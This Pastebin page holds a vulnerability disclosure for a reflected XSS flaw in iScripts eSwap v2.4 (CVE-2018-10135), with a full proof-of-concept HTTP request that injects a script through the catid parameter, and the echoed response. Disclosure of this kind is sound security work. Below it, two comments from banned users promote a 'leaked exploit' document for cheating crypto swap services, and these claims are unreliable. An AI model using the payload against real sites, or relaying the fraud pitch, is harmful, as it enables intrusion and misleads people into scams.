ManhNho

CVE-2018-10135

Apr 16th, 2018
6,416
0
Never
4
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.08 KB | None | 0 0
  1. # Exploit title: iScripts eSwap v2.4 - Reflected XSS User Panel
  2. # Date: 16/04/2018
  3. # Exploit Author: ManhNho
  4. # Vendor Homepage: https://www.iscripts.com
  5. # Software Link: https://www.iscripts.com/eswap
  6. # Demo Link: https://www.demo.iscripts.com/eswap/demo//index.php
  7. # Version: 2.4
  8. # CVE: Pending...
  9. # Tested on: Windows 10 / Kali Linux
  10. # Category: Webapps
  11.  
  12.  
  13. #1. Description
  14. -----------------------------------------------------
  15. iScripts eSwap v2.4 has Reflected XSS via the "catwiseproducts.php" function "search" parameter in User Panel.
  16.  
  17. #2. PoC
  18. -----------------------------------------------------
  19. Request:
  20.  
  21. GET /eswap/demo//catwiseproducts.php?catid=%22%3E%3Cscript%3Ealert(%271%27)%3C/script%3E HTTP/1.1
  22. Host: www.demo.iscripts.com
  23. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
  24. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  25. Accept-Language: en-GB,en;q=0.5
  26. Accept-Encoding: gzip, deflate
  27. Cookie: __utma=227100805.298811387.1522637403.1523506103.1523861118.10; __utmz=227100805.1522637403.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); messagesUtk=9ae2fcc5306f4d9c8d433f0f58efb968; __utma=129714457.1603653646.1523416273.1523433224.1523861782.3; __utmz=129714457.1523433224.2.2.utmcsr=iscripts.com|utmccn=(referral)|utmcmd=referral|utmcct=/supportdesk/demo.php; __utmb=227100805; __utmc=227100805; hs-messages-is-open=false; PHPSESSID=54e6027b90654e06b5e907e34b24361e; __utmb=129714457.3.10.1523861782; __utmc=129714457
  28. Connection: close
  29. Upgrade-Insecure-Requests: 1
  30. Cache-Control: max-age=0
  31.  
  32. Response:
  33.  
  34. HTTP/1.1 200 OK
  35. Date: Mon, 16 Apr 2018 07:08:49 GMT
  36. Server: Apache
  37. Expires: Thu, 19 Nov 1981 08:52:00 GMT
  38. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  39. Pragma: no-cache
  40. Connection: close
  41. Content-Type: text/html
  42. Content-Length: 30459
  43. ...
  44. action="catwiseproducts.php" method="POST" role="form">
  45. <input name="catid" type="hidden" id="catid" VALUE=""><script>alert('1')</script>">
  46. <input type="hidden" name="cmbItemType" id="cmbItemType" value="">
  47. ...
Advertisement
Comments
  • yoesf395
    95 days
    # CSS 0.84 KB | 0 0
    1. ✅ Leaked Exploit Documentation:
    2.  
    3. https://docs.google.com/document/d/1dOCZEHS5JtM51RITOJzbS4o3hZ-__wTTRXQkV1MexNQ/edit?usp=sharing
    4.  
    5. This made me $13,000 in 2 days.
    6.  
    7. Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 38% — they will simply correct the exchange rate.
    8. The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.
    9.  
    10. Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without verification from Swapzone — instant swap).
  • User was banned
  • Termozak
    78 days
    # CSS 0.85 KB | 0 0
    1. ✅ Leaked Exploit Documentation:
    2.  
    3. https://docs.google.com/document/d/1dOCZEHS5JtM51RITOJzbS4o3hZ-__wTTRXQkV1MexNQ/edit?usp=sharing
    4.  
    5. This made me $13,000 in 2 days.
    6.  
    7. Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 25% — they will simply correct the exchange rate.
    8. The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.
    9.  
    10. Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without verification from SimpleSwap — instant swap).
  • User was banned
Add Comment
Please, Sign In to add comment